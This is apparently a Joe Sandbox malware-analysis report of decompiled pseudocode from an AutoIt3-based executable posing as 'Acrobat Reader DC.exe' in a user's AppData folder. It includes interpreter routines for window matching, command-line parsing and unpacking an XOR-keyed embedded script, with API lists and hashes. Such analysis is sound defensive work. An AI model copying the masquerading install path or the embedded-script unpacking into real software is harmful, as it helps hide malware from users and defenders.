                                  							EnumChildWindows(GetDesktopWindow(), ??, ??);
                                  						}
                                  						_t345 = _a16;
                                  						E004109E0(E004457DF(_a16, _v76), _v76);
                                  						__eflags = _t273[0x39] - 1;
                                  						if(_t273[0x39] >= 1) {
                                  							E0044CDAF( *((intOrPtr*)(_t345 + 4)), _t345, _t273,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t345 + 4)))))));
                                  						}
                                  						E00402250( &_v24);
                                  						E00402250( &_v40);
                                  						E00402250( &_v56);
                                  						return _t273[0x39];
                                  					} else {
                                  						_t189 = E00401C90(_t273[6] - 1, _t362, __eflags);
                                  						__eflags =  *_t189 - 0x5d;
                                  						if( *_t189 == 0x5d) {
                                  							_v84 = 1;
                                  							_t350 = _t273[6] - 2;
                                  							__eflags = _t273[6] - 2;
                                  							while(1) {
                                  								__eflags = E00461A5B(_v88, _t398, _v88,  &_v52,  &_v36,  &_v84, _t350);
                                  								if(__eflags == 0) {
                                  									goto L54;
                                  								}
                                  								_t193 = E00445AE0(__eflags,  &_v52, L"LAST");
                                  								_t381 = _t380 + 8;
                                  								__eflags = _t193;
                                  								if(__eflags != 0) {
                                  									_t194 = E00445AE0(__eflags,  &_v36, 0x484ea8);
                                  									__eflags = _t194;
                                  									if(_t194 == 0) {
                                  										goto L42;
                                  									} else {
                                  										_t277 =  *_t273;
                                  										__eflags = _t277;
                                  										if(_t277 == 0) {
                                  											goto L46;
                                  										} else {
                                  											_push( &_v80);
                                  											_v80 =  *_t277;
                                  											_push(_a16);
                                  											goto L8;
                                  										}
                                  									}
                                  								} else {
                                  									_t303 =  &_v52;
                                  									_t209 = E00445AE0(__eflags,  &_v52, L"ACTIVE");
                                  									_t383 = _t381 + 8;
                                  									__eflags = _t209;
                                  									if(__eflags != 0) {
                                  										_t211 = E00445AE0(__eflags,  &_v36, 0x484ea8);
                                  										__eflags = _t211;
                                  										if(_t211 == 0) {
                                  											goto L42;
                                  										} else {
                                  											_push(GetForegroundWindow());
                                  											goto L49;
                                  										}
                                  									} else {
                                  										_t215 = E00445AE0(__eflags,  &_v52, L"HANDLE");
                                  										_t385 = _t383 + 8;
                                  										__eflags = _t215;
                                  										if(__eflags != 0) {
                                  											E00432C30(__eflags, _v36,  &_v80);
                                  											_t371 = _v80;
                                  											_t218 = IsWindow(_t371);
                                  											__eflags = _t218;
                                  											if(_t218 == 0) {
                                  												L46:
                                  												E00402250( &_v20);
                                  												E00402250( &_v36);
                                  												E00402250( &_v52);
                                  												__eflags = 0;
                                  												return 0;
                                  											} else {
                                  												_push(_t371);
                                  												L49:
                                  												_push(_t273);
                                  												E0044CDAF(_t303, _t350);
                                  												_v88 =  *( *_t273);
                                  												_t214 =  &_v88;
                                  												goto L7;
                                  											}
                                  										} else {
                                  											_t220 = E00445AE0(__eflags,  &_v52, L"REGEXPTITLE");
                                  											_t380 = _t385 + 8;
                                  											__eflags = _t220;
                                  											if(__eflags == 0) {
                                  												_t222 = E00445AE0(__eflags,  &_v52, L"CLASS");
                                  												_t380 = _t380 + 8;
                                  												__eflags = _t222;
                                  												if(__eflags == 0) {
                                  													_t223 = E00445AE0(__eflags,  &_v52, L"REGEXPCLASS");
                                  													_t380 = _t380 + 8;
                                  													__eflags = _t223;
                                  													if(__eflags == 0) {
                                  														_t224 = E00445AE0(__eflags,  &_v52, "X");
                                  														_t387 = _t380 + 8;
                                  														__eflags = _t224;
                                  														if(__eflags == 0) {
                                  															_t225 = E00445AE0(__eflags,  &_v52, "Y");
                                  															_t388 = _t387 + 8;
                                  															__eflags = _t225;
                                  															if(__eflags == 0) {
                                  																_t227 = E00445AE0(__eflags,  &_v52, "W");
                                  																_t389 = _t388 + 8;
                                  																__eflags = _t227;
                                  																if(__eflags == 0) {
                                  																	_t228 = E00445AE0(__eflags,  &_v52, "H");
                                  																	_t390 = _t389 + 8;
                                  																	__eflags = _t228;
                                  																	if(__eflags == 0) {
                                  																		_t229 = E00445AE0(__eflags,  &_v52, L"INSTANCE");
                                  																		_t391 = _t390 + 8;
                                  																		__eflags = _t229;
                                  																		if(__eflags == 0) {
                                  																			_t231 = E00445AE0(__eflags,  &_v52, L"ALL");
                                  																			_t392 = _t391 + 8;
                                  																			__eflags = _t231;
                                  																			if(__eflags == 0) {
                                  																				_t232 = E00445AE0(__eflags,  &_v52, L"TITLE");
                                  																				_t380 = _t392 + 8;
                                  																				__eflags = _t232;
                                  																				if(__eflags == 0) {
                                  																					_t233 = E0044CD93(__eflags,  &_v52, 0x484ea8);
                                  																					_t380 = _t380 + 8;
                                  																					__eflags = _t233;
                                  																					if(_t233 == 0) {
                                  																						continue;
                                  																					} else {
                                  																						goto L42;
                                  																					}
                                  																				} else {
                                  																					_t234 = _t273[2];
                                  																					__eflags = _t234 & 0x00000002;
                                  																					if((_t234 & 0x00000002) != 0) {
                                  																						E00402250( &_v20);
                                  																						E00402250( &_v36);
                                  																						E00402250( &_v52);
                                  																						return 0xfffffffc;
                                  																					} else {
                                  																						_t273[2] = _t234 | 0x00000001;
                                  																						E0040E0A0( &_v20,  &_v36);
                                  																						continue;
                                  																					}
                                  																				}
                                  																			} else {
                                  																				_t242 = E00445AE0(__eflags,  &_v36, 0x484ea8);
                                  																				_t380 = _t392 + 8;
                                  																				__eflags = _t242;
                                  																				if(_t242 == 0) {
                                  																					L42:
                                  																					E00402250( &_v20);
                                  																					E00402250( &_v36);
                                  																					_t198 = E00402250( &_v52) | 0xffffffff;
                                  																					__eflags = _t198;
                                  																					return _t198;
                                  																				} else {
                                  																					_t273[2] = _t273[2] | 0x00000040;
                                  																					continue;
                                  																				}
                                  																			}
                                  																		} else {
                                  																			_t273[2] = _t273[2] | 0x00000020;
                                  																			_push(_v36);
                                  																			_t243 = E00413190();
                                  																			_t380 = _t391 + 4;
                                  																			_t273[0x33] = _t243;
                                  																			continue;
                                  																		}
                                  																	} else {
                                  																		_t273[2] = _t273[2] | 0x00000400;
                                  																		_push(_v36);
                                  																		_t245 = E00413190();
                                  																		_t380 = _t390 + 4;
                                  																		_t273[0x38] = _t245;
                                  																		continue;
                                  																	}
                                  																} else {
                                  																	_t273[2] = _t273[2] | 0x00000200;
                                  																	_push(_v36);
                                  																	_t246 = E00413190();
                                  																	_t380 = _t389 + 4;
                                  																	_t273[0x37] = _t246;
                                  																	continue;
                                  																}
                                  															} else {
                                  																_t273[2] = _t273[2] | 0x00000100;
                                  																_push(_v36);
                                  																_t247 = E00413190();
                                  																_t380 = _t388 + 4;
                                  																_t273[0x36] = _t247;
                                  																continue;
                                  															}
                                  														} else {
                                  															_t273[2] = _t273[2] | 0x00000080;
                                  															_push(_v36);
                                  															_t249 = E00413190();
                                  															_t380 = _t387 + 4;
                                  															_t273[0x35] = _t249;
                                  															continue;
                                  														}
                                  													} else {
                                  														_t273[2] = _t273[2] | 0x00000010;
                                  														_t373 =  &(_t273[0x1e]);
                                  														E00401070(_t373);
                                  														_push( &_v36);
                                  														_t314 =  &_v60;
                                  														_push( &_v60);
                                  														goto L19;
                                  													}
                                  												} else {
                                  													_t273[2] = _t273[2] | 0x00000008;
                                  													E0040E0A0(_v80,  &_v36);
                                  													continue;
                                  												}
                                  											} else {
                                  												_t258 = _t273[2];
                                  												__eflags = _t258 & 0x00000001;
                                  												if((_t258 & 0x00000001) != 0) {
                                  													E00402250( &_v20);
                                  													E00402250( &_v36);
                                  													E00402250( &_v52);
                                  													return 0xfffffffd;
                                  												} else {
                                  													_t263 = _t258 | 0x00000002;
                                  													__eflags = _t263;
                                  													_t373 =  &(_t273[0xd]);
                                  													_t273[2] = _t263;
                                  													E00401070(_t373);
                                  													_t314 =  &_v36;
                                  													_push( &_v36);
                                  													_push( &_v68);
                                  													L19:
                                  													_push(_t373);
                                  													_t252 = E0046906D(_t314, __eflags);
                                  													__eflags =  *_t252;
                                  													if( *_t252 == 0) {
                                  														continue;
                                  													} else {
                                  														E00402250( &_v20);
                                  														E00402250( &_v36);
                                  														E00402250( &_v52);
                                  														return 0xfffffffe;
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L69;
                                  							}
                                  						}
                                  						goto L54;
                                  					}
                                  				} else {
                                  					E0044CDAF(_t287, _t343, _t343, GetForegroundWindow());
                                  					_v96 =  *((intOrPtr*)( *_t343));
                                  					_t214 =  &_v96;
                                  					L7:
                                  					_push(_t214);
                                  					_push(_a16);
                                  					L8:
                                  					E00436299();
                                  					E00402250( &_v28);
                                  					E00402250( &_v44);
                                  					E00402250( &_v60);
                                  					return 1;
                                  				}
                                  				L69:
                                  			}
                                  0x00000000
                                  0x00000000
                                  0x0046f190
                                  0x0046f190
                                  0x0046f193
                                  0x0046f195
                                  0x0046f2d4
                                  0x0046f2dd
                                  0x0046f2e6
                                  0x0046f2f6
                                  0x0046f19b
                                  0x0046f19e
                                  0x0046f1aa
                                  0x00000000
                                  0x0046f1aa
                                  0x0046f195
                                  0x0046f15b
                                  0x0046f165
                                  0x0046f16a
                                  0x0046f16d
                                  0x0046f16f
                                  0x0046f1ce
                                  0x0046f1d2
                                  0x0046f1db
                                  0x0046f1e9
                                  0x0046f1e9
                                  0x0046f1f2
                                  0x0046f171
                                  0x0046f171
                                  0x00000000
                                  0x0046f171
                                  0x0046f16f
                                  0x0046f129
                                  0x0046f12d
                                  0x0046f131
                                  0x0046f132
                                  0x0046f137
                                  0x0046f13a
                                  0x00000000
                                  0x0046f13a
                                  0x0046f0f4
                                  0x0046f0f8
                                  0x0046f0ff
                                  0x0046f100
                                  0x0046f105
                                  0x0046f108
                                  0x00000000
                                  0x0046f108
                                  0x0046f0bf
                                  0x0046f0c3
                                  0x0046f0ca
                                  0x0046f0cb
                                  0x0046f0d0
                                  0x0046f0d3
                                  0x00000000
                                  0x0046f0d3
                                  0x0046f08a
                                  0x0046f08e
                                  0x0046f095
                                  0x0046f096
                                  0x0046f09b
                                  0x0046f09e
                                  0x00000000
                                  0x0046f09e
                                  0x0046f055
                                  0x0046f059
                                  0x0046f060
                                  0x0046f061
                                  0x0046f066
                                  0x0046f069
                                  0x00000000
                                  0x0046f069
                                  0x0046f024
                                  0x0046f024
                                  0x0046f028
                                  0x0046f02b
                                  0x0046f034
                                  0x0046f035
                                  0x0046f039
                                  0x00000000
                                  0x0046f039
                                  0x0046eff7
                                  0x0046effb
                                  0x0046f004
                                  0x00000000
                                  0x0046f004
                                  0x0046ef86
                                  0x0046ef86
                                  0x0046ef89
                                  0x0046ef8b
                                  0x0046f2ab
                                  0x0046f2b4
                                  0x0046f2bd
                                  0x0046f2cd
                                  0x0046ef91
                                  0x0046ef91
                                  0x0046ef91
                                  0x0046ef94
                                  0x0046ef97
                                  0x0046ef9a
                                  0x0046ef9f
                                  0x0046efa3
                                  0x0046efa8
                                  0x0046efa9
                                  0x0046efa9
                                  0x0046efaa
                                  0x0046efaf
                                  0x0046efb2
                                  0x00000000
                                  0x0046efb8
                                  0x0046efbc
                                  0x0046efc5
                                  0x0046efce
                                  0x0046efde
                                  0x0046efde
                                  0x0046efb2
                                  0x0046ef8b
                                  0x0046ef84
                                  0x0046ef6a
                                  0x0046ef50
                                  0x00000000
                                  0x0046ef36
                                  0x0046ef00
                                  0x00000000
                                  0x0046eeec
                                  0x0046ee79
                                  0x0046ee81
                                  0x0046ee8a
                                  0x0046ee8e
                                  0x0046ee92
                                  0x0046ee95
                                  0x0046ee96
                                  0x0046ee97
                                  0x0046ee97
                                  0x0046eea0
                                  0x0046eea9
                                  0x0046eeb2
                                  0x0046eec2
                                  0x0046eec2
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                  • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                  • IsWindow.USER32(?), ref: 0046F29A
                                  • GetDesktopWindow.USER32 ref: 0046F356
                                  • EnumChildWindows.USER32 ref: 0046F35D
                                  • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                  • API String ID: 329138477-1919597938
                                  • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                  • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                  • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                  • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 91%
                                  			E00401F20(void* __ecx, void* __eflags, intOrPtr _a4, char _a7) {
                                  				void* _v12;
                                  				char _v16;
                                  				char _v32;
                                  				char _v40;
                                  				char _v48;
                                  				intOrPtr _v56;
                                  				intOrPtr _v60;
                                  				char _v64;
                                  				char _v80;
                                  				struct HINSTANCE__* _v84;
                                  				void* __edi;
                                  				void* __esi;
                                  				char _t68;
                                  				void* _t85;
                                  				void* _t88;
                                  				void* _t91;
                                  				void* _t100;
                                  				intOrPtr* _t107;
                                  				void* _t111;
                                  				intOrPtr _t115;
                                  				intOrPtr _t116;
                                  				void* _t117;
                                  				intOrPtr _t127;
                                  				void* _t148;
                                  				intOrPtr* _t167;
                                  				void* _t170;
                                  				void* _t171;
                                  				void* _t172;
                                  				void* _t173;
                                  				void* _t174;
                                  				void* _t175;
                                  
                                  				_t177 = __eflags;
                                  				_t159 =  &_v84;
                                  				E0040E6E0( &_v84);
                                  				_push(_a4);
                                  				_v16 = 0;
                                  				E00402560( &_v84, _t148, __eflags);
                                  				GetModuleFileNameW(0, "C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104);
                                  				_t68 = E00410100(0x4a7f6c,  &_v84, _t177); // executed
                                  				_a7 = _t68;
                                  				 *0x4a7f50 = 0x4a7f6c;
                                  				E00410960(_t159,  &_v48,  &_v80);
                                  				E00401B10(L"CMDLINERAW",  &_v32, _t177);
                                  				E00401980(0, 1,  &_v48,  &_v32);
                                  				E00402250( &_v32);
                                  				E00408F40(L"CMDLINERAW",  &_v48);
                                  				_t155 = L"CMDLINE";
                                  				_v40 = 1;
                                  				_v48 = 0;
                                  				E00401B10(L"CMDLINE",  &_v32, _t177);
                                  				E00401980(0, 0x100,  &_v48,  &_v32);
                                  				E00402250( &_v32);
                                  				E00401B10(L"CMDLINE",  &_v32, _t177);
                                  				E0040C2C0(0,  &_v32,  &_v12,  &_v16);
                                  				E00402250( &_v32);
                                  				_t127 = _v56;
                                  				E0040BC70( &_v32, _t177);
                                  				E00401A10( &_v84,  &_v32,  &_v32);
                                  				_t165 = _v32;
                                  				_t85 = E004114AB(L"CMDLINE", L"/ErrorStdOut", _v32);
                                  				_t171 = _t170 + 8;
                                  				if(_t85 == 0) {
                                  					 *0x4974e8 = 1;
                                  					_t127 = _t127 - 1;
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					_t165 = _v32;
                                  				}
                                  				_t88 = E004114AB(_t155, L"/AutoIt3OutputDebug", _t165);
                                  				_t172 = _t171 + 8;
                                  				if(_t88 == 0) {
                                  					 *0x4974e7 = 1;
                                  					_t127 = _t127 - 1;
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					_t165 = _v32;
                                  				}
                                  				_t91 = E004114AB(_t155, L"/AutoIt3ExecuteLine", _t165);
                                  				_t173 = _t172 + 8;
                                  				if(_t91 == 0) {
                                  					__eflags = _a7;
                                  					 *0x4a7f58 = 1;
                                  					 *0x4a7f54 = 0 | _a7 == 0x00000000;
                                  					GetModuleFileNameW(0, "C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104);
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					E0040E0A0(0x4a7f5c,  &_v32);
                                  					_t143 =  &_v32;
                                  					_t127 = _t127 - 2;
                                  					E00401A10( &_v84,  &_v32, 0x4a7f5c);
                                  					_t165 = _v32;
                                  				}
                                  				_t100 = E004114AB(_t155, L"/AutoIt3ExecuteScript", _t165);
                                  				_t174 = _t173 + 8;
                                  				if(_t100 == 0) {
                                  					if(_a7 != _t100) {
                                  						 *0x4a7f54 = 0;
                                  					} else {
                                  						 *0x4a7f54 = 3;
                                  					}
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					E00411567("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", _v32);
                                  					_t174 = _t174 + 8;
                                  					_t143 =  &_v32;
                                  					_t127 = _t127 - 2;
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					_t165 = _v32;
                                  				}
                                  				if( *0x4a7f6c == 0) {
                                  					E00411567("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", _t165);
                                  					_t174 = _t174 + 8;
                                  					_t143 =  &_v32;
                                  					_t127 = _t127 - 1;
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  				}
                                  				if(_t127 < 0) {
                                  					_t127 = 0;
                                  				}
                                  				_t156 = _v12;
                                  				_push(_t127 + 1);
                                  				E0040E830(_v12, _t143, 1);
                                  				_push(0);
                                  				_t107 = E0040CF00(_t143, _v12, 0, 1);
                                  				_t175 = _t174 + 0x14;
                                  				_t167 = _t107;
                                  				E00408F40(_v12, _t167);
                                  				 *((intOrPtr*)(_t167 + 8)) = 1;
                                  				 *_t167 = _t127;
                                  				if(_t127 > 0) {
                                  					_t115 = 0;
                                  					while(1) {
                                  						_t116 = _t115 + 1;
                                  						_push(_t116);
                                  						_a4 = _t116;
                                  						_t117 = E0040CF00(_t143, _v12, 0, 1);
                                  						_t175 = _t175 + 0xc;
                                  						_t156 =  &_v32;
                                  						E0040E6A0(_t143, _t156, _t117);
                                  						_t143 = _t156;
                                  						E00401A10( &_v84, _t156, _t117);
                                  						if(_a4 >= _t127) {
                                  							goto L12;
                                  						}
                                  						_t115 = _a4;
                                  					}
                                  				}
                                  				L12:
                                  				E00402250( &_v32);
                                  				_t111 = E004019D0(E00408F40(_t156,  &_v48),  &_v64);
                                  				_v84 = 0;
                                  				_v64 = 0x484eac;
                                  				E004019D0(_t111,  &_v64);
                                  				_push(_v60);
                                  				E004111DC();
                                  				return E00402250( &_v80);
                                  			}

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • __wcsicoll.LIBCMT ref: 00402007
                                  • __wcsicoll.LIBCMT ref: 0040201D
                                  • __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                  • __wcsicoll.LIBCMT ref: 00402049
                                  • _wcscpy.LIBCMT ref: 0040207C
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104), ref: 00428B5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe$CMDLINE$CMDLINERAW
                                  • API String ID: 3948761352-1298289597
                                  • Opcode ID: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                  • Opcode Fuzzy Hash: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 87%
                                  			E00452719(void* __eflags, signed int _a4, intOrPtr _a8, char _a12) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				signed int _v20;
                                  				char _v548;
                                  				char _v1076;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t37;
                                  				void* _t52;
                                  				void* _t54;
                                  				signed int _t59;
                                  				void* _t63;
                                  				void* _t64;
                                  				intOrPtr* _t89;
                                  				void* _t90;
                                  				void* _t91;
                                  				void* _t93;
                                  				void* _t96;
                                  				void* _t97;
                                  
                                  				_t99 = __eflags;
                                  				_t89 = _a4;
                                  				_v8 = 0;
                                  				while(1) {
                                  					E00414D04( &_v16, 1, 4,  *_t89);
                                  					E0044AFEF( &_v16, _t99,  &_v16, 4, 0x18ee);
                                  					_v12 = 0;
                                  					_t37 = E00414D30( &_v16, "FILE");
                                  					_t93 = _t91 + 0x18;
                                  					_t100 = _t37;
                                  					if(_t37 != 0) {
                                  						break;
                                  					}
                                  					_v8 = _v8 + 1;
                                  					E00414D04( &_a4, 4, 1,  *_t89);
                                  					_t83 = _a4 ^ 0x0000adbc;
                                  					_t63 = (_a4 ^ 0x0000adbc) + (_a4 ^ 0x0000adbc);
                                  					E00414D04( &_v548, 1, _t63,  *_t89);
                                  					E0044AFEF( &_v548, _t100,  &_v548, _t63, _t83 + 0xb33f);
                                  					 *((short*)(_t90 + _t63 - 0x220)) = 0;
                                  					E00411567( &_v1076,  &_v548);
                                  					E00414D04( &_a4, 4, 1,  *_t89);
                                  					_t86 = _a4 ^ 0x0000f820;
                                  					_t64 = (_a4 ^ 0x0000f820) + (_a4 ^ 0x0000f820);
                                  					E00414D04( &_v548, 1, _t64,  *_t89);
                                  					E0044AFEF( &_v548, _t100,  &_v548, _t64, _t86 + 0xf479);
                                  					_t23 =  &_a12; // 0x452944
                                  					 *((short*)(_t90 + _t64 - 0x220)) = 0;
                                  					E00411567( *_t23,  &_v548);
                                  					_t88 = _a8;
                                  					_t79 =  &_v1076;
                                  					_t52 = E0041313C( &_v1076, _a8);
                                  					_t96 = _t93 + 0x58;
                                  					if(_t52 == 0) {
                                  						L6:
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						_t54 = E0041313C(_t88, "*");
                                  						_t97 = _t96 + 8;
                                  						if(_t54 != 0) {
                                  							L5:
                                  							_push(1);
                                  							_push(1);
                                  							_push( *_t89); // executed
                                  							E004150D1(_t64, _t79, _t88, _t89, _t99); // executed
                                  							_t30 =  &_v20; // 0x452944
                                  							E00414D04(_t30, 4, 1,  *_t89);
                                  							_t31 =  &_v20; // 0x452944
                                  							_t59 =  *_t31 ^ 0x000087bc;
                                  							_v20 = _t59;
                                  							_push(1);
                                  							_push(_t59 + 0x18);
                                  							_push( *_t89); // executed
                                  							E004150D1(_t64, _t30, _t88, _t89, _t99); // executed
                                  							_t91 = _t97 + 0x28;
                                  							continue;
                                  						} else {
                                  							_t99 = _v8 - _t54;
                                  							if(_v8 == _t54) {
                                  								goto L6;
                                  							} else {
                                  								goto L5;
                                  							}
                                  						}
                                  					}
                                  					L8:
                                  				}
                                  				return 6;
                                  				goto L8;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_fseek_wcscpy
                                  • String ID: D)E$D)E$FILE
                                  • API String ID: 3888824918-361185794
                                  • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                  • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 87%
                                  			E0040E360(intOrPtr __eax, void* __ecx, void* __eflags) {
                                  				char _v524;
                                  				char _v1052;
                                  				short _v1580;
                                  				char _v1596;
                                  				short _v1598;
                                  				short _v1600;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t37;
                                  				intOrPtr _t44;
                                  				signed int _t45;
                                  				void* _t49;
                                  				intOrPtr _t53;
                                  				intOrPtr _t54;
                                  				signed int _t55;
                                  				signed int _t63;
                                  				short* _t65;
                                  				intOrPtr _t75;
                                  				intOrPtr _t76;
                                  				signed int _t80;
                                  				signed int _t89;
                                  				intOrPtr _t93;
                                  				intOrPtr _t94;
                                  				void* _t95;
                                  				void* _t96;
                                  				void* _t98;
                                  				signed int _t103;
                                  				void* _t107;
                                  				void* _t108;
                                  
                                  				_t109 = __eflags;
                                  				_push(_t98);
                                  				_push(_t95);
                                  				_push(0x400);
                                  				 *0x4a90e8 = 0;
                                  				 *0x4a90ec = __eax;
                                  				 *0x4a90f0 = 0;
                                  				 *0x4a90f4 = 0;
                                  				 *0x4a90f8 = 0;
                                  				 *0x4a90fc = 0;
                                  				 *0x4a9100 = 0x485a88;
                                  				 *0x4a9104 = 0;
                                  				 *0x4a9108 = 0;
                                  				 *0x4a910c = 0;
                                  				 *0x4a9110 = 0x485a88;
                                  				 *0x4a9114 = 0;
                                  				 *0x4a9118 = 0;
                                  				 *0x4a911c = 0;
                                  				 *0x4a9124 = 0;
                                  				 *0x4a912c = 0;
                                  				 *0x4a9130 = 0x66; // executed
                                  				_t37 = E004115D7(_t95, _t98, __eflags); // executed
                                  				 *0x4a9120 = _t37;
                                  				GetModuleFileNameW(0,  &_v1580, 0x104);
                                  				E00413A0E( &_v1580,  &_v524,  &_v1052, 0, 0);
                                  				E00413A5A( &_v1052, L"Include", 0x104);
                                  				E00413A9E( &_v1580,  &_v524,  &_v1052, 0, 0);
                                  				_push(0x20a);
                                  				_t44 = E004115D7(_t95, _t98, _t109);
                                  				_t89 =  *0x4a9124; // 0x1
                                  				_t75 =  *0x4a9120; // 0xa56d30
                                  				 *((intOrPtr*)(_t75 + _t89 * 4)) = _t44;
                                  				_t45 =  *0x4a9124; // 0x1
                                  				_t76 =  *0x4a9120; // 0xa56d30
                                  				 *0x4a9124 = _t45 + 1;
                                  				E00411567( *((intOrPtr*)(_t76 + _t45 * 4)),  &_v1580);
                                  				_t107 = (_t103 & 0xfffffff8) - 0x63c + 0x44;
